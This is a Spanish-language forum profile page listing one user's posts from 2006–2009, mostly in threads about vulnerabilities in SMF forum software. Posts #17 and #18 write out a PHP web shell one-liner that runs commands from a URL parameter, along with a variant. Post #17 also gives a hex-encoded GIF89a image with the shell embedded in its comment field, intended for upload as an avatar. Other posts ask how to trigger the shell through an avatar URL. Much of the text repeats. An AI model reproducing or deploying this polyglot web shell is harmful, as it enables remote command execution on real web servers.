sirdarckcat tirame un hueso dale 
me conformo con 1 solo bug remoto que sea bien comprometedor
me conformo con 1 solo bug remoto que sea bien comprometedor
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#11
Nivel Web / Re: Proyecto de Auditoria a SMF 2.0 - Laboratorio de Bugs/Nivel Web
26 Octubre 2009, 21:59 PM #12
Nivel Web / Re: Múltiples inyecciones SQL en SMF <= 1.1.10 y 2.0 <= RC1.2
23 Octubre 2009, 18:34 PM
todos sabemos aca de que estas hecho WHK
mis felicitaciones por otro exelente trabajo
mis felicitaciones por otro exelente trabajo
#13
Nivel Web / Re: Reset Admin Password 1.1.7 SMF (TEORIA)
4 Febrero 2009, 22:56 PM
claro nork es hex h4x0r o no ves que es un exploit "prov8"
XDDDDDDDDDDDDDDDDDD
XDDDDDDDDDDDDDDDDDD
#14
Nivel Web / Re: [Duda] Existe o no el Bug SMF 1.1.7
28 Diciembre 2008, 01:25 AM
me parece que las nueves versiones de smf convierten las imagenes a png despues de que se suben asi que en ese transpaso se borra la ***** que le agregamos XD
voy a seguri haciendo pruebas al respecto
saludos
// si efectivamente tiene que ser una animacion si o si lo que subimos sino el smf la convierte en png.
a todo esto como se lanzaria el comentario que tenemos en la imagen en shell?
voy a seguri haciendo pruebas al respecto
saludos
// si efectivamente tiene que ser una animacion si o si lo que subimos sino el smf la convierte en png.
a todo esto como se lanzaria el comentario que tenemos en la imagen en shell?
#15
Nivel Web / Re: [Duda] Existe o no el Bug SMF 1.1.7
26 Diciembre 2008, 03:53 AM
a menos que quieras inyectar codigo JS solo basta con que con el gimp lo agreges como comentario. si queres te la spaso por pm.
aun no entiendo muy bien como se dispararia la shell, para ver un avatar seria asi la direccion http://www.explotame.com/foro/index.php?action=dlattach;attach=110;type=avatar
como habria que manipularla?
aun no entiendo muy bien como se dispararia la shell, para ver un avatar seria asi la direccion http://www.explotame.com/foro/index.php?action=dlattach;attach=110;type=avatar
como habria que manipularla?
#16
Nivel Web / Re: [Duda] Existe o no el Bug SMF 1.1.7
26 Diciembre 2008, 00:34 AM
si lo entendi, estoy probandolo en un smf 1.1.7 al cual siempre le tiro XD
lo unico que consegui es que intentando el phpinfo me tire un error 500 XD
seguire viendo si se puede hacer algo pero de momento inyecte ambos codigos y los subi como avatar y no paso nada
lo unico que consegui es que intentando el phpinfo me tire un error 500 XD
seguire viendo si se puede hacer algo pero de momento inyecte ambos codigos y los subi como avatar y no paso nada
#17
Nivel Web / Re: [Duda] Existe o no el Bug SMF 1.1.7
25 Diciembre 2008, 19:15 PM
gracias por la aclaracion
asi que si quiero inyectar codigo JS tengo que usar "= 1 y "/*" and "*/"."
y si solo quiero agregar la shellcita <?php system($_GET[cmd]); ?>
tengo que dejar la cabecera tal como esta no? (GIF89a)
quedaria algo asi hexadecimalmente
474946383961000100800100000000FFFFFF21FE133C3F70687020
73797374656D28245F4745545B636D645D293B203F3E002C000000000
10001000002024401003B
asi que si quiero inyectar codigo JS tengo que usar "= 1 y "/*" and "*/"."
y si solo quiero agregar la shellcita <?php system($_GET[cmd]); ?>
tengo que dejar la cabecera tal como esta no? (GIF89a)
quedaria algo asi hexadecimalmente
474946383961000100800100000000FFFFFF21FE133C3F70687020
73797374656D28245F4745545B636D645D293B203F3E002C000000000
10001000002024401003B
#18
Nivel Web / Re: [Duda] Existe o no el Bug SMF 1.1.7
25 Diciembre 2008, 00:54 AM
disculpen mi ignorancia sobre rfi pero en los casos en los que se utilizarian
<?php system($_GET[cmd]); ?>
o
<? if(isset($_GET[cmd])) system($_GET[cmd]) ?>
serian si el server donde esta alojado corre bajo windows no? si es un unix tambien funcionaria?
<?php system($_GET[cmd]); ?>
o
<? if(isset($_GET[cmd])) system($_GET[cmd]) ?>
serian si el server donde esta alojado corre bajo windows no? si es un unix tambien funcionaria?
#19
Hacking / Re: NO-IP VICTIM CREATOR 1.0 !!!! Olvidandonos de las IPs dinamicas
14 Marzo 2006, 16:02 PM
linda utilidad la unica falla que le encontre de momento es que escribe esta mal escrito XD
#20
Análisis y Diseño de Malware / Re: Flux 1.1
9 Febrero 2006, 05:17 AM
Estaba seguro que la ultima versión era la 1.0.1 o acaso no estoy en lo cierto??? Porke como leo 1.1 estoy en la duda 